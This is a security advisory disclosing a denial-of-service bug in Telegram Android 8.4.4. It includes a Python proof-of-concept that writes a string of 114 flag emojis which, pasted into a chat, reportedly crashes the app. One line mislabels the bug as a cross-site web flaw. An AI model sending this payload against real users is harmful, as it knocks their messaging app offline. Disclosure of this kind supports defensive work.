Document Title: =============== Telegram Android v8.4.4 - Denial of Service (PoC) References (Source): ==================== https://twitter.com/h4shur Release Date: ============= 2022-01-30 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== Telegram is a freeware, cross-platform, cloud-based instant messaging (IM) service. The service also provides end-to-end encrypted video calling, VoIP, file sharing and several other features. It was launched for iOS on 14 August 2013 and Android in October 2013. The servers of Telegram are distributed worldwide to decrease frequent data load with five data centers in different regions, while the operational center is based in Dubai in the United Arab Emirates. Various client apps are available for desktop and mobile platforms including official apps for Android, iOS, Windows, macOS and Linux (although registration requires an iOS or Android device and a working phone number). There are also two official Telegram web twin apps – WebK and WebZ – and numerous unofficial clients that make use of Telegram's protocol. All of Telegram's official components are open source, with the exception of the server which is closed-sourced and proprietary. Telegram provides end-to-end encrypted voice and video calls and optional end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted between the app and the server, so that ISPs and other third-parties on the network can't access data, but the Telegram server can. Users can send text and voice messages, make voice and video calls, and share an unlimited number of images, documents (2 GB per file), user locations, animated stickers, contacts, and audio files. In January 2021, Telegram surpassed 500 million monthly active users. It was the most downloaded app worldwide in January 2021 with 1 billion downloads globally as of late August 2021. Abstract Advisory Information: ============================== An independent vulnerability researcher discovered Android application vulnerabilities in the Telegram application. Affected Product(s): ==================== Vendor: telegram.org / telegram.me / t.me Product: Android Telegram application (Android-Application) https://telegram.org/android Vulnerability Disclosure Timeline: ================================== 2022-01-30: Researcher Notification & Coordination (Security Researcher) 2022-01-30: Public Disclosure Discovery Status: ================= Published Exploitation Technique: ======================= local Severity Level: =============== medium Disclosure Type: ================ Full Disclosure Technical specifications and description: ================================ 1.1 In version 8.4.4 of Android Telegram application, a denial of service vulnerability was discovered by H4shur. Vulnerability is in the emojis of these messenger. 1.2 If you send a number of flag emojis with any text on the chat page, clicking on that message will stop the program altogether and avoid providing services. Proof of Concept (PoC): ======================= 1.1 A Denial of Service (DOS) attack is a type of cyberattack in which a malicious person performs an attack with the aim of removing the resources of a system from the reach of its users. It is natural that if this attack is successful, the result will be a slowdown or disabling of the equipment and resources available to the victim. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. PoC: Exploitation 1.1 Run the python script, it will create a new file "outputbufferh4shur.txt". 1.2 Run Telegram Android and go to "Saved Messages" or any Chat page. 1.3 Copy the content of the file "outputbufferh4shur.txt". 1.4 Paste the content of outputbufferh4shur.txt into the "Write a message..." and then type any text to this message. 1.5 Ops... Telegram Crashed <3 script: bufferh4shur = "🇮🇷" * 114 try: f=open("outputbufferh4shur.txt","w") print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur)) f.write(bufferh4shur) f.close() print("[!] File Created!") except: print("File cannot be created!") Security Risk: ============== 1.1 A Denial of Service (DOS) attack is a type of cyberattack in which a malicious person performs an attack with the aim of removing the resources of a system from the reach of its users. It is natural that if this attack is successful, the result will be a slowdown or disabling of the equipment and resources available to the victim. Credits & Authors: ================== h4shur Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur h4shursec@gmail.com